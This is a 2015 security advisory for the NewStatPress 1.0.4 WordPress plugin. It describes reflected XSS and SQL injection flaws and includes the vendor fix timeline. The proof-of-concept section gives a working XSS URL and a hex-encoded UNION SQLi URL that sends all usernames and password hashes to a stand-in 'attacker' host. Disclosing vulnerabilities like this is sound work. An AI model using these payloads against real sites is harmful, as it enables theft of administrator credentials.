g0blin Research: NewStatPress 1.0.4, Multiple Vulnerabilities

NewStatPress 1.0.4, Multiple Vulnerabilities

The NewStatPress plugin utilizes on lines 28 and 31 of the file ‘includes/nsp_search.php’ several variables from the $_GET scope, without sanitation. While WordPress automatically escapes quotes on this scope, the outputs on these lines are outside of quotes, and as such can be utilized to trigger a Reflected XSS attack. In addition to the XSS attack, the Search functionality is susceptible to a SQLI attack due to usage of user input without sanitation. In particular, at line 98 of ‘includes/nsp_search.php’. Utilizing a specially crafted SQL query, we can trigger disclosure of user hashes through an IMG tag as the data channel.

Homepage

https://wordpress.org/plugins/newstatpress/

CVSS Score

4.9

CSSS Vector

(AV:N/AC:M/Au:S/C:P/I:P/A:N)

Attack Scope

remote

Authorization Required

Administrative

Mitigation

Update to version 1.0.5.

Proof of Concept

The following URL will trigger an alert box in FireFox when visited, should the user be logged in as an Administrative user.

http://localhost/wp-admin/admin.php?groupby1=checked%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29&page=nsp_search&newstatpress_action=search

The following URL will trigger an SQLI attack, which in turn injects an element into the page, which allows for transmission of the retrieved user hashes to an attacker-controlled URL. In the PoC below, it will output an IMG element pointing to http://attacker/?creds=CREDS, where CREDS is replaced with a concatenated list of usernames and password hashes. As the strings in the call are encoded with the MySQL function ‘hex’, there is no need to use any quotes. This is to bypass the quote escaping implemented by WordPress. Should an Administrative user be tricked into visiting the URL, all of the usernames and password hashes will be transmitted (so long as there are no restrictive CSP headers implemented).

http://localhost/wp-admin/admin.php?where1=ip&what1=0&where2=spider+%3D+0+UNION+SELECT+CONCAT%280x3C696D67207372633D22687474703A2F2F61747461636B65722F3F63726564733D%2C%28select+hex%28group_concat%28concat_ws%28char%2858%29%2Cwp_users.user_login%2Cwp_users.user_pass%29%29%29+from+wp_users+group+by+1%3D1%29%2C0x223e%29--&what2=0&searchsubmit=Search&page=nsp_search&newstatpress_action=search

Timeline

2015-06-30: Vulnerability discovered
2015-06-30: Vendor notified
2015-06-30: Vendor responded
2015-06-30: Version 1.0.5 released – issue resolved
2015-07-07: Advisory released